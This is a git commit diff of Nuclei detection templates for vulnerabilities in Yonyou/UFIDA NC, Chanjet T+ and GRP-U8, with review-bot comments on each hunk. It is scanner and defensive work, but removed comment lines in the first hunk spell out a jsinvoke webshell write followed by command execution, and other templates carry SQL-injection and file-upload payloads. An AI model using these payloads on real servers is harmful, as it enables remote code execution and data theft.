updated-templates-p

patch-1
Prince Chaddha 2023-09-17 14:21:38 +05:30
parent 88153faaf8
commit 274c14e763
14 changed files with 29 additions and 81 deletions


@ -1,11 +1,11 @@
id: yonyou-nc-uapjs-jsinvoke-fileupload
id: CNVD-C-2023-76801
info:
name: Yonyou NC uapjs jsinvoke 文件上传漏洞
name: UFIDA NC uapjs - RCE vulnerability
author: SleepingBag945
severity: critical
description: 用友NC 及 NCC系统存在任意方法调用漏洞通过uapjs (jsinvoke)利用漏洞可调用危险方法造成攻击。
tags: yonyou
description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
tags: cvnd,cvnd2023,yonyou,rce
http:
- raw:
@ -28,15 +28,3 @@ http:
- status_code_1 == 200
- status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
condition: and
# POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
# Host: {{Hostname}}
# {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}
# POST /cmdb.jsp?error=bsh.Interpreter HTTP/1.1
# Host: {{Hostname}}
# cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())
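Review bot: The new tags line misspells the CNVD tags: `cvnd,cvnd2023` should read `cnvd,cnvd2023` to match the `CNVD-C-2023-76801` id this commit introduces and the tag convention used for other CNVD templates; suggest `tags: cnvd,cnvd2023,yonyou,rce`. The new description's closing clause, "dangerous methods can be called to cause attacks", states no concrete impact; "dangerous methods can be invoked, leading to remote code execution" would match the `rce` tag and the name. The http block and its raw request start after the first hunk and are not visible here.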


@ -10,7 +10,7 @@ info:
max-request: 1
fofa-query: app="ZyXEL-USG-FLEX"
verified: true
tags: cve,cve2022,zyxel,auth-bypass
tags: cve,cve2022,zyxel,auth-bypass,router
http:
- method: GET


@ -5,7 +5,7 @@ info:
author: SleepingBag945
severity: high
description: |
Changjietong Information Technology Co., Ltd. is a company dedicated to providing platform services, application services, and data value-added services with financial and management services as its core to China's small and micro enterprises. Changjietong Information Technology Co., Ltd. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
reference: |
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
@ -38,14 +38,8 @@ http:
part: body_1
words:
- "{\"RetCode\":0}"
condition: and
- type: word
part: body_2
words:
- "{\"RetCode\":2}"
condition: and
- type: status
status:
- 200
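Review bot: The second hunk appears to drop the body_2 matcher (the `{\"RetCode\":2}` check on the second response), leaving the template to fire on `{\"RetCode\":0}` in the first body plus a 200 status; a zero return code is a plausible normal response, so consider keeping a second discriminating condition to limit false positives on patched or unrelated hosts. In the context lines, `reference: |` makes the reference a multi-line string whose content is the literal text `- https://...` rather than a YAML list; nuclei tolerates a string there, but `reference:` followed by the list item is the conventional form. The matchers block starts above the hunk, so the `matchers-condition` in force is not visible here.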


@ -28,6 +28,7 @@ http:
- "<configuration>"
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "application/octet-stream"


@ -3,7 +3,7 @@ id: chanjet-tplus-fileupload
info:
name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
author: SleepingBag945
severity: critical
severity: high
description: |
There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
reference:
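Review bot: The context name line still reads `TPluse` while the description says TPlus; suggest `name: UFIDA Chanjet TPlus Upload.aspx - Arbitrary File Upload`. The severity is lowered to high while the description still states that an unauthenticated upload lets an attacker control the server, so either the description or the severity should be reconciled so readers are not misled about the impact.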


@ -20,20 +20,15 @@ http:
POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
{"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "0x06d49632c9dc9bcb62aeaef99612ba6b"
- "Message\":\"245"
- "DatabaseException"
part: body
condition: and
- type: status
status:
- 200
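Review bot: `part: body` appears twice inside the single word matcher, once above `words` and once below; if the reflow left both on the new side, that is a duplicate key in one mapping which most parsers resolve silently to the last value, so confirm that only one survives. The matcher otherwise requires all three tokens plus a 200 status, which is a reasonably specific signal. The raw request and the rest of the http block start above the hunk.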


@ -1,21 +0,0 @@
id: chanjetcrm-createsite-sqli
info:
name: Chanjetcrm - create_site SQL Injection
author: unknown
severity: critical
description: |
There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
reference:
- https://stack.chaitin.com/techblog/detail?id=10
tags: chanjetcrm,sqli
http:
- method: GET
path:
- "{{BaseURL}}/WebSer~1/create_site.php?site_id=1"
matchers:
- type: word
words:
- "register fail,please again"
part: body


@ -1,4 +1,4 @@
id: yonyou-nc-filereceiveservlet-fileupload
id: yonyou-filereceiveservlet-fileupload
info:
name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
@ -12,7 +12,7 @@ info:
max-request: 1
fofa-query: app="用友-UFIDA-NC"
verified: true
tags: yonyou,nc,fileupload,intrusive
tags: yonyou,fileupload,intrusive
variables:
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
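Review bot: The context name line has a typo: `name: Yonyou NC FileReceiveServlet - Arbitrary File Upload`. Since this commit already renames the id and retags the file, fixing the name at the same time keeps the template's identifiers consistent.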


@ -1,10 +1,10 @@
id: yonyou-grp-u8-sqli
id: yonyou-grp-u8-xxe
info:
name: yonyou-grp-u8-sqli
name: Yonyou UFIDA GRP-u8 - XXE
author: SleepingBag945
severity: critical
description: 用友GRP-u8存在XXE漏洞该漏洞源于应用程序解析XML输入时没有进制外部实体的加载导致可加载外部SQL语句以及命令执行
description: UFIDA GRP-u8 has an XXE vulnerability. This vulnerability is caused by the application not loading external entities when parsing XML input, resulting in the loading of external SQL statements and command execution.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
tags: yonyou,grp,xxe,sqli
@ -14,26 +14,17 @@ http:
- |
POST /Proxy HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
matchers-condition: and
matchers:
- type: word
words:
- "1759837260"
- type: word
words:
- "<R9PACKET>"
- type: status
status:
- 200
# 可尝试启动并调用xpcmdshell执行命令
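Review bot: The new description inverts the cause: it says the application is "not loading external entities", whereas the Chinese line it replaces says loading of external entities is not prohibited; suggest `description: UFIDA GRP-u8 has an XXE vulnerability. The application does not disable external entity loading when parsing XML input, which allows loading of external SQL statements and command execution.` Separately, the rename to `yonyou-grp-u8-xxe` sits uneasily with the visible detection logic: the request body carries `select 42540*41369` and the matcher looks for `1759837260`, its product, which is an SQL-expression evaluation check rather than an XXE check, and the reference URL and the `sqli` tag still point at SQL injection; confirm the classification before merging. The http block continues between the two hunks and is not fully visible here.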


@ -22,5 +22,5 @@ http:
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1,"java.io")'
- 'status_code_1 == 200 && contains(body_1,"java.io") && contains(body_1,"EOFExceptionYI")'
condition: and
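Review bot: The added marker `EOFExceptionYI` looks like an exception class name fused with two bytes of whatever follows it in the response; if that suffix is not stable across server versions or serialization framing, the template will stop matching. Consider confirming the exact response bytes and, if the suffix is incidental, using `contains(body_1,"EOFException")` together with a second stable token instead. The `condition: and` line is redundant with a single dsl entry but harmless.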


@ -11,7 +11,7 @@ info:
metadata:
fofa-query: icon_hash="1085941792"
verified: true
tags: yonyou,nc,intrusive
tags: yonyou,intrusive,fileupload
http:
- raw:


@ -13,7 +13,7 @@ info:
max-request: 2
fofa-query: app="用友-UFIDA-NC
verified: true
tags: yonyou,nc,intrusive
tags: yonyou,intrusive,ufida,fileupload
variables:
v1: "{{rand_int(1,100)}}"
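Review bot: The context line `fofa-query: app="用友-UFIDA-NC` is missing its closing double quote; YAML accepts the plain scalar, but the query value itself is unbalanced, so it should read `fofa-query: app="用友-UFIDA-NC"`. The same unterminated value appears in the following file section (the `ncmessageservlet` template) and should get the same fix; the filereceiveservlet section earlier in this commit shows the correctly quoted form.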


@ -1,7 +1,7 @@
id: yonyou-nc-ncmessageservlet-rce
info:
name: UFIDA NC NCMessageServlet - Deserialization RCE Detect
name: UFIDA NC NCMessageServlet - Deserialization RCE Detection
author: SleepingBag945
severity: critical
description: |
@ -12,7 +12,7 @@ info:
max-request: 2
fofa-query: app="用友-UFIDA-NC
verified: true
tags: yonyou,rce,deserialization,nc
tags: yonyou,rce,deserialization,rce
http:
- raw:
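Review bot: The new tags line repeats `rce`, so replacing `nc` produced a duplicate tag; suggest `tags: yonyou,rce,deserialization`. The name change to "Detection" is fine. The http block starts after the hunk and is not visible here.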